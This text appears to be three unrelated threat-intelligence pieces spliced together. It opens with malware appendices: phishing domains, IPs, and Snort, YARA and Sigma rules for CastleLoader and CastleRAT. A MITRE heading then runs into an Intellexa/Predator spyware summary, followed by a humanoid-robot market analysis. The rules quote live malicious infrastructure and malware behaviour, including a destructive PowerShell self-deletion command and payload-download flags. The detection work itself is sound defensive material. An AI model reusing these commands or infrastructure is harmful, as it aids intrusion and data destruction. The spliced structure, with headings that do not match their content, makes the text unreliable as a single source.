guest-update666532345[.]com
hotelroomprice1039375[.]icu
info-guest44567645[.]com
info676345677[.]com
justnewdmain[.]com
newmessage10294[.]com
programsbookss[.]com
request-info3444[.]com
request-info4433345[.]com
request345553[.]com
request44456776[.]com
update-gues3429[.]com
update-guest4398317809[.]com
update-info14546[.]com
update-info3458421[.]com
update-info4467[.]com
update-info4468765[.]com
update-info539156[.]com
update-info71556[.]com
update-reques898665[.]com

Cluster 3 IP Addresses Hosting Booking.com-Themed Domains:
178[.]17[.]57[.]103
192[.]109[.]138[.]102

Appendix I: Snort Rules for CastleLoader

alert http $HOME_NET any -> $EXTERNAL_NET any (msg:"CastleLoader Malware Outbound Checkin"; flow:established,to_server; content:"GET"; http_method; urilen:82,norm; content:"|2F|service|2F|settings|2F|"; http_uri; fast_pattern; content:"Cache-Control|3A 20|no-cache|0D 0A|Connection|3A 20|Keep-Alive|0D 0A|Pragma|3A 20|no-cache|0D 0A|User-Agent|3A 20|"; http_header; depth:79; content:"Host|3A 20|"; http_header; distance:0;  content:!"Accept"; http_header; pcre:"/User\x2dAgent[^\x0d]+\x0d\x0aHost\x3a\x20[^\x0d]+\x0d\x0a\x0d\x0a/"; reference:url,https://catalyst.prodaft.com/public/report/understanding-current-castleloader-campaigns/overview; classtype:trojan-activity; sid:52460302; rev:1; metadata:author MGUT, created_at 2025-07-24, mitre_tactic_id TA0011, mitre_tactic_name Command-And-Control, triage_family castleloader, deployment triage;)

alert http $HOME_NET any -> $EXTERNAL_NET any (msg:"CastleLoader Malware Outbound Payload Request"; flow:established,to_server; content:"GET"; http_method; content:"|2F|service|2F|download|2F|"; http_uri; fast_pattern; content:"Cache-Control|3A 20|no-cache|0D 0A|Connection|3A 20|Keep-Alive|0D 0A|Pragma|3A 20|no-cache|0D 0A|User-Agent|3A 20|"; http_header; depth:79; content:"Host|3A 20|"; http_header; distance:0;  content:!"Accept"; http_header; pcre:"/User\x2dAgent[^\x0d]+\x0d\x0aHost\x3a\x20[^\x0d]+\x0d\x0a\x0d\x0a/"; reference:url,https://catalyst.prodaft.com/public/report/understanding-current-castleloader-campaigns/overview; classtype:trojan-activity; sid:52460303; rev:1; metadata:author MGUT, created_at 2025-07-24, mitre_tactic_id TA0011, mitre_tactic_name Command-And-Control, triage_family castleloader, deployment triage;)

alert http $HOME_NET any -> $EXTERNAL_NET any (msg:"CastleLoader Malware Stager Outbound Payload Request"; flow:established,to_server; content:"GET"; http_method; content:"|2F|service|2F|download|2F|"; http_uri; depth:18; fast_pattern; content:".bin"; http_uri; content:"GoogeBot"; http_user_agent; depth:8; isdataat:0,relative; reference:url,https://catalyst.prodaft.com/public/report/understanding-current-castleloader-campaigns/overview; classtype:trojan-activity; sid:52460304; rev:1; metadata:author MGUT, created_at 2025-08-12, mitre_tactic_id TA0011, mitre_tactic_name Command-And-Control, triage_family castleloader, deployment triage;)

alert tcp $EXTERNAL_NET 79 -> $HOME_NET any (msg:"CastleLoader Malware Inbound Command Retrieval via Finger Service"; flow:established,to_client; content:"Login|3A 20|"; depth:7; content:"Plan|3A|"; distance:0; content:"%random%"; fast_pattern; distance:0; content:"|20|--tlsv1.2|20|-L|20|-o|20|"; distance:0; content:"|0D 0A|mkdir|20|"; distance:0; content:"|0D 0A|tar|20|"; distance:0; reference:url,https://tria.ge/251110-zcgvkstpck; classtype:trojan-activity; sid:52460334; rev:2; metadata:author MGUT, created_at 2025-10-29, mitre_tactic_id TA0011, mitre_tactic_name Command-And-Control;)

Appendix J: Snort Rules for CastleRAT

alert tcp $HOME_NET any -> $EXTERNAL_NET any (msg:"CastleRAT Malware Outbound Handshake"; flow:established,to_server; dsize:20; stream_size:server,=,1; content:"|02 56 77 8E A5 83 D7 05 02 C2 1E D9 70 5A 47 E5 11 92 B5 5A|"; fast_pattern; depth:20; reference:url,https://tria.ge/250808-w4hpeaxtcw; classtype:trojan-activity; sid:52460307; rev:1; metadata:author MGUT, created_at 2025-08-18, mitre_tactic_id TA0011, mitre_tactic_name Command-And-Control;)

alert tcp $HOME_NET any -> $EXTERNAL_NET any (msg:"CastleRAT Malware Outbound Handshake"; flow:established,to_server; dsize:20; stream_size:server,=,1; content:"|BF CF 04 82 45 DF 4F 09 55 5E 0B 15 9F E2 91 A0 68 51 1E 87|"; fast_pattern; depth:20; reference:url,https://tria.ge/250814-wyqstsyjx3; classtype:trojan-activity; sid:52460308; rev:1; metadata:author MGUT, created_at 2025-08-18, mitre_tactic_id TA0011, mitre_tactic_name Command-And-Control;)

alert tcp $HOME_NET any -> $EXTERNAL_NET any (msg:"CastleRAT Malware Outbound Handshake"; flow:established,to_server; dsize:20; stream_size:server,=,1; content:"|6B 13 5C 08 BD 49 59 75 79 62 4E EA 2F DE 57 F4 6E 08 8B 6B|"; fast_pattern; depth:20; reference:url,https://tria.ge/250219-nsbsqazpep; classtype:trojan-activity; sid:52460309; rev:1; metadata:author MGUT, created_at 2025-08-18, mitre_tactic_id TA0011, mitre_tactic_name Command-And-Control;)

alert tcp $HOME_NET any -> $EXTERNAL_NET any (msg:"CastleRAT Malware Outbound Handshake"; flow:established,to_server; dsize:20; stream_size:server,=,1; content:"|56 EA 59 DB 6B DD 36 81 42 01 C6 84 DF 5A 6B E8 38 14 8D 07|"; fast_pattern; depth:20; reference:url,https://tria.ge/250505-wmbvjabk3t; classtype:trojan-activity; sid:52460310; rev:1; metadata:author MGUT, created_at 2025-08-18, mitre_tactic_id TA0011, mitre_tactic_name Command-And-Control;)

alert tcp $HOME_NET any -> $EXTERNAL_NET any (msg:"CastleRAT Malware Outbound Handshake"; flow:established,to_server; dsize:20; stream_size:server,=,1; content:"|A8 CF 1E 1D BA 27 49 FB 63 38 F4 52 A7 9C 39 CF 4A 85 E5 5B|"; fast_pattern; depth:20; reference:url,https://tria.ge/250822-vwt7ssxly9; classtype:trojan-activity; sid:52460311; rev:1; metadata:author MGUT, created_at 2025-08-22, mitre_tactic_id TA0011, mitre_tactic_name Command-And-Control;)

alert tcp $HOME_NET any -> $EXTERNAL_NET any (msg:"CastleRAT Malware Outbound Handshake"; flow:established,to_server; dsize:20; stream_size:server,=,1; content:"|0F 0D F7 66 4C B2 D5 12 BA 55 CC BB 2E 1B F4 AD C0 E0 7C A2|"; fast_pattern; depth:20; reference:url,https://tria.ge/250822-rt355svtfs; classtype:trojan-activity; sid:52460312; rev:1; metadata:author MGUT, created_at 2025-08-22, mitre_tactic_id TA0011, mitre_tactic_name Command-And-Control;)

alert tcp $HOME_NET any -> $EXTERNAL_NET any (msg:"CastleRAT Malware Outbound Handshake"; flow:established,to_server; dsize:20; stream_size:server,=,1; content:"|74 6F D9 7F B5 48 F6 91 26 E0 16 5A 81 29 4F 35 21 6C 61 82|"; fast_pattern; depth:20; reference:url,https://tria.ge/250813-a7c3fadl7z; classtype:trojan-activity; sid:52460313; rev:1; metadata:author MGUT, created_at 2025-08-22, mitre_tactic_id TA0011, mitre_tactic_name Command-And-Control;)

alert tcp $HOME_NET any -> $EXTERNAL_NET any (msg:"CastleRAT Malware Outbound Handshake"; flow:established,to_server; dsize:20; stream_size:server,=,1; content:"|61 57 7C E8 EE BE 56 71 B3 98 F4 A6 87 E3 0C 39 50 0C 29 41|"; fast_pattern; depth:20; reference:url,https://tria.ge/250822-vwt7ssxly9; classtype:trojan-activity; sid:52460314; rev:1; metadata:author MGUT, created_at 2025-08-22, mitre_tactic_id TA0011, mitre_tactic_name Command-And-Control;)

alert tcp $HOME_NET any -> $EXTERNAL_NET any (msg:"CastleRAT Malware Outbound Handshake"; flow:established,to_server; dsize:20; stream_size:server,=,1; content:"|4D 58 29 58 84 15 1B 1D 2A D9 80 90 5C 36 1C A0 43 05 80 48|"; fast_pattern; depth:20; reference:url,https://tria.ge/250701-v6911aykv9; classtype:trojan-activity; sid:52460335; rev:1; metadata:author MGUT, created_at 2025-10-30, mitre_tactic_id TA0011, mitre_tactic_name Command-And-Control;)

alert http $HOME_NET any -> $EXTERNAL_NET any (msg:"Possible CastleRAT Python Malware Outbound Request To IP Geo Location Service ip-api"; flow:established,to_server;  content:"GET"; http_method; urilen:19,norm; content:"|2F|line|2F 3F|fields|3D|16385"; http_uri; depth:19; fast_pattern; content:"Connection|3A 20|Keep-Alive|0D 0A|Host|3A 20|www.ip-api.com|0D 0A 0D 0A|"; http_raw_header; depth:48; reference:url,https://tria.ge/250808-w4hpeaxtcw; classtype:trojan-activity; sid:52460315; rev:1; metadata:author MGUT, created_at 2025-08-24, mitre_tactic_id TA0011, mitre_tactic_name Command-And-Control;)

alert http $HOME_NET any -> $EXTERNAL_NET any (msg:"Possible CastleRAT C Variant Malware Outbound Request To IP Geo Location Service ip-api"; flow:established,to_server;  content:"GET"; http_method; urilen:20,norm; content:"|2F|line|2F 3F|fields|3D|147457"; http_uri; depth:20; fast_pattern; content:"Connection|3A 20|Keep-Alive|0D 0A|Host|3A 20|www.ip-api.com|0D 0A 0D 0A|"; http_raw_header; depth:48; reference:url,https://tria.ge/250822-vwt7ssxly9; classtype:trojan-activity; sid:52460316; rev:1; metadata:author MGUT, created_at 2025-08-24, mitre_tactic_id TA0011, mitre_tactic_name Command-And-Control;)

alert http $HOME_NET any -> $EXTERNAL_NET any (msg:"Possible CastleRAT C Variant Malware Outbound Request To IP Geo Location Service ip-api"; flow:established,to_server;  content:"GET"; http_method; urilen:20,norm; content:"|2F|line|2F 3F|fields|3D|147505"; http_uri; depth:20; fast_pattern; content:"Connection|3A 20|Keep-Alive|0D 0A|Host|3A 20|www.ip-api.com|0D 0A 0D 0A|"; http_raw_header; depth:48; reference:url,https://tria.ge/250814-wyqstsyjx3; classtype:trojan-activity; sid:52460317; rev:1; metadata:author MGUT, created_at 2025-08-24, mitre_tactic_id TA0011, mitre_tactic_name Command-And-Control;)

alert http $HOME_NET any -> $EXTERNAL_NET any (msg:"Possible CastleRAT C Variant Malware Outbound Request To IP Geo Location Service ip-api"; flow:established,to_server; content:"GET"; http_method; urilen:20,norm; content:"|2F|line|2F 3F|fields|3D|147489"; http_uri; depth:20; fast_pattern; content:"Connection|3A 20|Keep-Alive|0D 0A|Host|3A 20|www.ip-api.com|0D 0A 0D 0A|"; http_header; depth:48; reference:url,https://tria.ge/251028-27bcds1nbk; classtype:trojan-activity; sid:52460333; rev:1; metadata:author MGUT, created_at 2025-10-29, mitre_tactic_id TA0011, mitre_tactic_name Command-And-Control;)

Appendix K: Snort Rules for Matanbuchus

alert udp $EXTERNAL_NET any -> $HOME_NET any (msg:"Matanbuchus Loader Inbound DNS Tunneled Data ACK"; content:"|AA AA 85 80 00 01 00 01 00 00 00 00 01 30 14|"; fast_pattern; depth:15; content:"|10|"; distance:20; within:1; content:"|00 10 00 01 00 00 00 3C 00 03 02|ok"; distance:0; isdataat:!1,relative; reference:url,https://www.morphisec.com/blog/ransomware-threat-matanbuchus-3-0-maas-levels-up; reference:url,https://tria.ge/250716-b5sksa1wgt; sid:52460327; rev:1; metadata:author MGUT, created_at 2025-09-30, mitre_tactic_id TA0011, mitre_tactic_name Command-And-Control;)

alert tcp $HOME_NET any -> $EXTERNAL_NET any (msg:"Matanbuchus Loader Malware Outbound C2 Communication"; flow:established,to_server; content:"POST|20|"; depth:5; content:"|2E|php"; distance:0; content:"1|0D 0A|User-Agent|3A 20|"; distance:0; content:"Host|3A 20|"; distance:0; content:"Content-Length|3A 20|"; distance:0; content:"Content-Type|3A 20|application|2F|x-www-form-urlencoded|0D 0A|Accept-Language|3A 20|"; distance:0; content:"|0D 0A 0D 0A|"; content:!"|26|"; distance:0; content:"|3D|ey"; fast_pattern; distance:0; pcre:"/User\x2dAgent[^\x0d]+\x0d\x0aHost[^\x0d]+\x0d\x0aContent\x2dLength[^\x0d]+\x0d\x0aContent\x2dType[^\x0d]+\x0d\x0aAccept\x2dLanguage[^\x0d]+\x0d\x0a\x0d\x0a/"; reference:url,https://tria.ge/240328-t4ge8sbf65; classtype:bad-unknown; sid:52460167; rev:1; metadata:author MGUT, created_at 2024-03-29, mitre_tactic_id TA0011, mitre_tactic_name Command-And-Control;)

Appendix L: Yara Rule for CastleLoader

rule MAL_CastleLoader {
    meta:
        author = "Insikt Group, Recorded Future"
        date = "2025-08-06"
        description = "Detection of the CastleLoader malware executable"
        version = "1.0"
        reference = "https://www.ibm.com/think/x-force/dissecting-castlebot-maas-operation"
        hash = "1b6befc65b19a63b4131ce5bcc6e8c0552fe1e1d136ab94bc7d81b3924056156"
        hash = "202f6b6631ade2c41e4762e5877ce0063a3beabce0c3f8564b6499a1164c1e04"
        hash = "25e0008aba82690e0f58c9d9fcfbc5d49820aa78d2f7bfcd0b85fb969180fc04"
        hash = "b45cce4ede6ffb7b6f28f75a0cbb60e65592840d98dcb63155b9fa0324a88be2"
        hash = "fb9de7448e9e30f717c171f1d1c90ac72828803a16ad385757aeecc853479d3c"
        hash = "6444f0e3f78254aef663837562d258a2236a77f810ee8d832de7d83e0fdd5783"
        malware = "CastleLoader"
        malware_id = "8RF9P9"
        category = "MALWARE"
    strings:
        $vmware_check = { 3D 56 4D 77 61 75 ?? 81 7D F8 72 65 56 4D 0F 85 ?? ?? ?? ?? 81 7D F4 77 61 72 65 }
        $api_hashing = { 0F BE 0C 1E 8B C2 F6 C3 01 75 0F C1 E8 03 0F AF C1 8B CA C1 E1 07 33 C1 }
        $stack_str_url = { C7 ?5 [1-4] 74 00 74 00 C7 ?5 [1-4] 69 00 6E 00 C7 ?5 [1-4] 67 00 73 00 }
        $mov_edx_apihash1 = { BA 44 A0 2D 39 } // CreateMutexW
        $mov_edx_apihash2 = { BA 2B C2 86 58 } // GetLastError
        $mov_edx_apihash3 = { BA 94 F9 86 F8 } // RtlAllocateHeap
        $mov_edx_apihash4 = { BA B2 48 70 60 } // ExitProcess
    condition:
        uint16(0) == 0x5A4D and all of them
}

Appendix M: Yara Rules for CastleRAT

rule MAL_CastleRAT_Python {
    meta:
        author = "Insikt Group, Recorded Future"
        date = "2025-08-18"
        description = "Detection of the python variant of CastleRAT malware"
        version = "1.0"
        reference = "https://www.recordedfuture.com/research/from-castleloader-to-castlerat-tag-150-advances-operations"
        reference = "https://www.ibm.com/think/x-force/dissecting-castlebot-maas-operation"
        reference = "https://catalyst.prodaft.com/public/report/understanding-current-castleloader-campaigns/overview"
        hash = "94dc0f696a46f3c225b0aa741fbd3b8997a92126d66d7bc7c9dd8097af0de52a"
        hash = "53775af67e9df206ed3f9c0a3756dbbc4968a77b1df164e9baddb51e61ac82df"
        malware = "CastleRAT"
        malware_id = "9WCga-"
        category = "MALWARE"
        actor = "TAG-150"
        actor_id = "9nk6DO"
    strings:
        $cmd1 = "S_CONNECT" fullword
        $cmd2 = "S_COMMAND" fullword
        $cmd3 = "S_PING" fullword
        $cmd4 = "S_CMD" fullword
        $cmd5 = "S_DELETE" fullword
        $cmd6 = "S_POWERSHELL" fullword
        $cmd7 = "S_START_TERMINAL" fullword
        $cmd8 = "S_SESSION_MESSAGE" fullword
        $cmd9 = "S_UPLOAD" fullword
        $fun1 = "CheckElevation():" fullword
        $fun2 = "GetHWID("
        $fun3 = "GetOS("
        $fun4 = "GetIpGeo("
        $fun5 = "rc4createkeyA("
        $fun6 = "EncryptDecryptBufA("
        $fun7 = "RecvTimeout("
        $fun8 = "Send("
        $fun9 = "Connect("
        $fun10 = "ThreadPing("
        $fun11 = "ThreadRecvTerminal("
        $fun12 = "ThreadTerminalSession("
        $fun13 = "ThreadUploadFile("
        $fun14 = "SelfDelete()" fullword
    condition:
        filesize < 50KB and
        7 of ($cmd*) and
        10 of ($fun*)
}

rule MAL_CastleRAT_C {
    meta:
        author = "Insikt Group, Recorded Future"
        date = "2025-08-18"
        description = "Detection of the C variant of CastleRAT malware"
        version = "2.0"
        reference = "https://www.recordedfuture.com/research/from-castleloader-to-castlerat-tag-150-advances-operations"
        reference = "https://www.ibm.com/think/x-force/dissecting-castlebot-maas-operation"
        reference = "https://catalyst.prodaft.com/public/report/understanding-current-castleloader-campaigns/overview"
        hash = "1ff6ee23b4cd9ac90ee569067b9e649c76dafac234761706724ae0c1943e4a75"
        hash = "e6bcdf375649a7cbf092fcab65a24d832d8725d833e422e28dfa634498b00928"
        hash = "67cf6d5332078ff021865d5fef6dc61e90b89bc411d8344754247ccd194ff65b"
        hash = "963c012d56c62093d105ab5044517fdcce4ab826f7782b3e377932da1df6896d"
        hash = "60125159523c356d711ffa1076211359906e6283e25f75f4cf0f9dc8da6bf7b0"
        hash = "cf202498b85e6f0ae4dffae1a65acbfec78cc39fce71f831d45f916c7dedfa0c"
        malware = "CastleRAT"
        malware_id = "9WCga-"
        category = "MALWARE"
        actor = "TAG-150"
        actor_id = "9nk6DO"
    strings:
        $log_tag1 = "clipboardlog.txt" fullword wide
        $log_tag2 = "keylog.txt" fullword wide
        $wnd_class1 = "IsabellaWine" fullword wide
        $wnd_class2 = "camera!" fullword wide
        $log_fmt1 = "[%02d:%02d %02d.%02d.%02d] %ws" fullword wide
        $log_fmt2 = "[%02d:%02d %02d.%02d.%02d] " fullword wide
        $log_fmt3 = "[%02d.%02d.%02d %02d:%02d] " fullword wide
        $s1 = "(VPN)" wide ascii
        $s2 = "rundll32 \"C:\\Windows\\System32\\shell32.dll\" #61"  wide
        $s3 = "\"%ws\" -no-deelevate" fullword wide
        $s4 = "IsWindowVisible" fullword ascii
        $s5  = "UAC_InputIndicatorOverlayWnd" fullword wide
        $s6 = "www.ip-api.com" fullword wide
        $s7 = "MachineGuid" fullword wide
        $s8 = "line/?fields=" wide
        $s9 = "C:\\Windows\\System32\\cmd.exe" wide
        $s10  = "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe" fullword wide

     condition:
       uint16(0) == 0x5a4d and
       any of ($log_tag*) and
       any of ($wnd_class*) and
       any of ($log_fmt*) and
       all of ($s*)
}

rule MAL_CastleRAT_Shellcode_Loader {
    meta:
        author = "Insikt Group, Recorded Future"
        date = "2025-10-20"
        description = "Detection of a python based shellcode loader that runs CastleRAT malware"
        version = "1.0"
        reference = "https://www.recordedfuture.com/research/from-castleloader-to-castlerat-tag-150-advances-operations"
        hash = "058d83fd8834246d6d2a2771e6e0aeb4d4ef8a6984cbe1133f3a569029a4b1f7"
        hash = "190e673787bfc6e8eeebccd64c8da61747d5be06f87d3aea879118ef1a9f4836"
        malware = "CastleRAT"
        actor = "TAG-150"
        actor_id = "9nk6DO"
        category = "MALWARE"
        malware_id = "9WCga-"
    strings:
        $s1 = "SHELL64_OFFSET = "
        $s2 = "SHELL32_OFFSET = "
        $s3 = "SHELLFUNC = WINFUNCTYPE"
        $s4 = "LoadPE_Shell"
        $s5 = "crt = WinDLL(\"msvcrt.dll\");"
        $s6 = "OPEN_EXISTING" fullword
        $s7 = ".VirtualProtect("
        $s8 = "offset"
        $s9 = "from ctypes"
    condition:
        filesize < 50KB and $s9 at 0 and all of them
}

Appendix N: CastleRAT Sigma Rules

title: CastleRAT C Variant Malware Log File Creation
id: 4d785ac8-17fe-4765-b427-9a31073ad1a7
status: stable
description: Detects CastleRAT C variant malware log file creation events. The log file is used to store output from the keylogger and clipboard stealer.
references:
  - https://tria.ge/250701-v6911aykv9
  - https://tria.ge/251101-r8f9xstjap
author: Insikt Group, Recorded Future
date: 2025-08-29
level: high
tags:
  - attack.t1608 # Stage Capabilities
  - attack.t1074.001 # Local Data Staging
  - attack.t1115 # Clipboard Data
  - attack.t1056.001 # Keylogging
logsource:
  product: windows
  category: file_event
detection:
  castlerat_logs:
    TargetFilename|endswith:
      - '\AppData\Local\Temp\MuuuuuhGer3'
      - '\AppData\Local\Temp\PluhhSuk3'
      - '\AppData\Local\Temp\AsdDsaHaha3'
      - '\AppData\Local\Temp\ChuChuka'
      - '\AppData\Local\Temp\GagikMaraguiSS'
      - '\AppData\Local\Temp\LowUshrSudujes'
      - '\AppData\Local\Temp\RarnuiKarta'
      - '\AppData\Local\Temp\GrazGraznii'
      - '\AppData\Local\Temp\GiveGvein3'
      - '\AppData\Local\Temp\BeruiowdgsouiHTR'
      - '\AppData\Local\Temp\GDSongdsgndohSDU'
      - '\AppData\Local\JohniiDepp'
      - '\AppData\Local\LuchiiSvet'
      - '\AppData\Local\HmmMaybe'
  condition: castlerat_logs
falsepositives:
  - Unlikely

title: CastleRAT Python Malware Self Deletion
id: 1050a0c4-1110-4b55-938c-0d27259ddd1e
status: stable
description: Detects the execution of powershell by the Python variant of CastleRAT malware to delete itself.
references:
  - https://tria.ge/250822-r3a6qaak2t
author: Insikt Group, Recorded Future
date: 2025-08-28
tags:
  - attack.t1070.004   # Indicator Removal: File Deletion
logsource:
    product: windows
    category: process_creation
detection:
    self_delete:
        CommandLine|endswith: 'powershell Start-Sleep -Seconds 4; Remove-Item -Path * -Force; exit'
    condition: self_delete
level: high
falsepositives:
  - Potential benign installer activity

title: CastleRAT C Malware Self Deletion
id: 79268bc8-3220-447d-bc7a-02199bed58e9
status: stable
description: Detects the execution of powershell by the C variant of CastleRAT malware to delete itself.
references:
  - https://tria.ge/251101-lh19hstqft/behavioral2
author: Insikt Group, Recorded Future
date: 2025-11-06
tags:
  - attack.t1070.004   # Indicator Removal: File Deletion
logsource:
    product: windows
    category: process_creation
detection:
    self_delete:
        CommandLine|endswith: 'powershell Start-Sleep -Seconds 3; Remove-Item -Path * -Force'
    condition: self_delete
level: high
falsepositives:
  - Potential benign installer activity

Appendix O: MITRE ATT&CK Techniques

Executive Summary

Insikt Group identified several individuals and entities linked to Intellexa and its broader network of associated companies. These connections span technical, operational, and corporate roles, including backend development, infrastructure setup, and company formation. Using export and import data, Insikt Group identified one entity linked to the previously reported Czech cluster that facilitated the shipment of Intellexa products to clients. In at least one instance, a direct delivery was made to an end user, while additional entities in Kazakhstan and the Philippines appear to have been involved in product imports, indicating an expanding network footprint. Two additional entities in the advertising sector may be tied to the “Aladdin” ad-based infection vector, previously associated with the Czech cluster via a leaked 2022 invoice. In addition, Recorded Future’s proprietary intelligence revealed ongoing Predator spyware activity in multiple countries, including new evidence of its deployment in Iraq.

The continued domestic use of mercenary spyware such as Predator poses significant privacy, legal, and physical security risks worldwide. Although civil society remains the primary target in most publicly documented cases, recent evidence shows that executives and other high-profile individuals with substantial intelligence value are increasingly being targeted as well. Due to Predator’s costly licensing model, operators are likely to reserve its deployment for high-value strategic targets, placing politicians, business leaders, and individuals in sensitive roles at heightened risk. Meanwhile, the widespread and likely unlawful use of spyware against political opposition continues to be a pressing issue under investigation in several European Union (EU) member states, including Poland and Greece.

Insikt Group assesses that several key trends are shaping the spyware ecosystem, including growing balkanization as companies split along geopolitical lines, with some sanctioned entities seeking renewed legitimacy through acquisitions while others shift toward regions with weaker oversight (1, 2). Despite this, a core network of facilitators continues to underpin the industry’s operations. Furthermore, rising competition and secrecy surrounding high-value exploit technologies are heightening risks of corruption, insider leaks, and attacks on spyware vendors themselves. Targeting has also expanded beyond traditional civil society figures to include corporate leaders and private-sector individuals (1, 2), suggesting that the publicly visible cases represent only a fraction of a much larger, concealed global ecosystem.

Key Findings

• Insikt Group uncovered additional companies highly likely tied to Intellexa’s broader corporate web, particularly within the previously discussed Czech cluster. At least one of these entities appears to have been used to ship Intellexa products to clients, offering further insight into Intellexa's global business structures.
• Two newly identified companies appear to operate in the advertising sector and may be connected to a previously reported ad-based infection vector known as “Aladdin.” This vector was earlier associated with the Czech cluster through a leaked invoice from 2022 showing payments for a proof-of-concept to an individual linked to that cluster.
• Analysis of export and import databases revealed indications that one of the newly identified companies was used to deliver Intellexa products to end customers, either directly or through intermediaries. This research also exposed two additional entities located in Kazakhstan and the Philippines.

Summary

Advances in large-language models (LLMs) and the anticipated arrival of artificial general intelligence (AGI) are rapidly closing the gap between concept and capability. The prospect of humanoid robots functioning autonomously in workplaces and public spaces is moving from speculative to attainable.

Global population decline is accelerating the demand for humanoid robots designed to operate within human environments and offset growing labor shortages across industries.

A growing number of companies are developing humanoid robots for roles in manufacturing, customer service, and even athletic competition. Investors are positioning for long-term growth, with research suggesting that by 2060, more than three billion humanoid robots could be integrated into human society.

China appears poised to lead the field of humanoid robotics. Facing a steep population decline, its strategic emphasis on automation and robotics is becoming central to sustaining economic output and competitiveness.

Humanoid robots will almost certainly be vulnerable to cyberattacks, ranging from hijacking and data leaks to the formation of botnets. This highlights the urgent need to treat humanoid robots with the same rigorous cybersecurity standards as any connected system.

Figure 1: Summary of the conditions that could create a huge demand for humanoid robots in the coming years (Source: Recorded Future)

Analysis

Humanoid robots are general-purpose, bipedal robots modeled after the human form and designed to work alongside humans. They are currently being designed to work in factories, serve us, and look after us.

Understanding the increased attention being given to humanoid robotics begins with recognizing a primary driver: a global labor shortage caused by population decline. Modern economies rely on sustained consumption and productivity growth, both of which are underpinned by expanding populations. Yet, across much of the developed world, and increasingly in emerging markets, this two-century trend of population growth is reversing. The global workforce is shrinking, and the implications for economic output are profound. As traditional labor pools contract, humanoid robots represent a potential solution, a means of sustaining productivity and economic stability in the face of structural demographic change.

Figure 2: Forecasts indicate a global population decline, with developed economies projected to experience the most significant impact first (Source: The Economist)

Robots working in this capacity are not a new concept. For decades, specialized industrial robots have revolutionized manufacturing by enhancing productivity and mitigating labor shortages, particularly in aging societies such as Japan and South Korea. However, as global demographics shift and labor shortages accelerate, repetitive automation alone will not sustain economic growth. The next phase of robotics will require systems capable of operating seamlessly in environments designed for humans, robots with human-like forms, and, increasingly, human-like cognition.

Advances in LLMs have accelerated progress toward AGI, making human-like cognition in robots a plausible near-term reality. Combined with breakthroughs in robotics engineering and declining production costs, these developments position humanoid robots to extend far beyond industrial applications. They are poised to enter service sectors, healthcare, defense, and domestic care, therefore addressing critical workforce shortages driven by aging populations.

The commercial potential of the humanoid robot market is significant. Recognizing this, both startups and established corporations are making substantial investments in humanoid robotics. Leading artificial intelligence (AI) companies are investing in humanoid robotics to develop platforms that integrate their cognitive technologies into mobile, human-like forms. At the same time, automotive manufacturers with decades of experience in using robotics and specializing in mass production are investing in the humanoid robotics market and adapting their capabilities to mass-produce humanoid robots, viewing it as a natural evolution. Today, humanoid robots are deployed in industrial environments and showcased in global sporting events such as the inaugural 2025 Robot Olympics in Beijing.
While the production and manufacturing of humanoid robots is complicated and expensive, with each passing year, the cost of producing them is decreasing. Globally, analysts expect the average bill-of-materials (BOM) cost per humanoid robot to decrease to USD 13,000–17,000 by the early 2030s, thereby reducing the average purchasing cost per robot.

China, in particular, is leading the way. Some of its humanoid robots, such as Unitree’s R1 robot, can already be purchased for around USD 5,500.

Figure 3: Projected cost reductions associated with large-scale production increases (Source: Bank of America Institute “Humanoid Robots 101”)

Furthermore, unlike other countries that have attempted to offset labor shortages through immigration, China’s policy has been more focused on finding a technological solution rather than importing labor. China’s long-term planning and economic strategy appear to be increasingly focused on robotics, and it has spent the last decade preparing its industrial base to mass-produce robots. It comes as no surprise that Recorded Future’s Network Intelligence continues to reveal state–linked malware families targeting the robotics industry, likely seeking to acquire sensitive intellectual property.

Figure 4: Malware families targeting robotics industries (Source: Recorded Future)

Some speculative forecasts suggest that China could eventually field approximately 300,000,000 humanoid robots to compensate for its demographic decline, as its population is predicted to shrink significantly over the coming decades. Having dominated the production of electric vehicles, China and its leadership are now aiming to dominate the humanoid robotics sector as well. These robots might also be exported to other countries facing demographic stress, potentially generating massive revenue for China.

Figure 5: China leading with patent filings mentioning humanoid robots 2020-25 (left) (Source: Morgan Stanley, “The Humanoid 100”); graph showing the organisations that are filing for humanoid technological development (right) (Source: MITSUI & CO. “Humanoid Robots”)

By comparison, there are predictions that the US might reach approximately 77,000,000 humanoid robots within a similar timeframe, coinciding with projected population decline in the US. However, these numbers remain highly speculative and should be treated as illustrative rather than definitive forecasts.

Figure 6: Selected examples of notable humanoid robots currently under development; the list of humanoid robots represented in this image is not exhaustive (Source: Voronoi)

The world appears to be moving steadily toward the age of humanoid robots. By 2060, studies project that up to three billion of these machines could coexist with humans, most of them serving in household and personal-assistant capacities. While this might seem speculative, the recent rapid progress made in artificial intelligence and electric vehicles suggests that it is a serious possibility.

The path forward, however, is not without obstacles. The energy demands of humanoid robots could pose a significant question, and producing millions of units would require mining massive quantities of critical materials. Consequently, there is skepticism that the humanoid robot market will expand as rapidly as forecasts suggest. Some view current enthusiasm as part of the emerging technology hype cycle, warning that a correction, or “hype crash,” is likely.

Figure 7: Projected global ownership of humanoid robots, potentially reaching billions by 2060 (Source: Bank of America Institute “Humanoid Robots 101”)

We should also take the cybersecurity risks posed to humanoid robots seriously. For example, researchers recently discovered a critical flaw in Unitree Robotics’ Bluetooth protocol that could let attackers wirelessly hijack its humanoid robots — machines already in use across labs, universities, and law enforcement agencies. In another instance, researchers found leaked, hard-coded encryption keys that allow one compromised robot to infect others nearby, forming botnets with root-level control. One model also transmitted data to servers in China without user consent. This followed a viral incident in May 2025, in which a humanoid robot turned on its human handlers.

Figure 8: Statement from Unitree Robotics regarding the security vulnerabilities in their robots in October 2025 (Source: Unitree Robotics LinkedIn Post)

These security flaws, whether due to negligence or intent, create opportunities for serious cyber threats. Humanoid robots are often network-connected systems that must meet the same security standards as any other digital asset.

Outlook

China is likely to lead in the development and export of humanoid robots. It has already invested heavily in research and development and faces mounting pressure to deploy robots to mitigate severe labor shortages. Thus, China is likely to produce more cost-effective options than other countries, such as the United States, which will likely produce more advanced but more expensive models. Much like China’s lower-priced electric vehicles that are now dominating global markets, its humanoid robots may follow a similar trajectory, expanding rapidly into developing economies.

Car manufacturers will likely increasingly enter the humanoid robot industry. This shift is partly an effort to offset declining car sales driven by population decline, but primarily because these companies already deploy robots at scale and possess the expertise to mass-produce complex machinery on assembly lines.

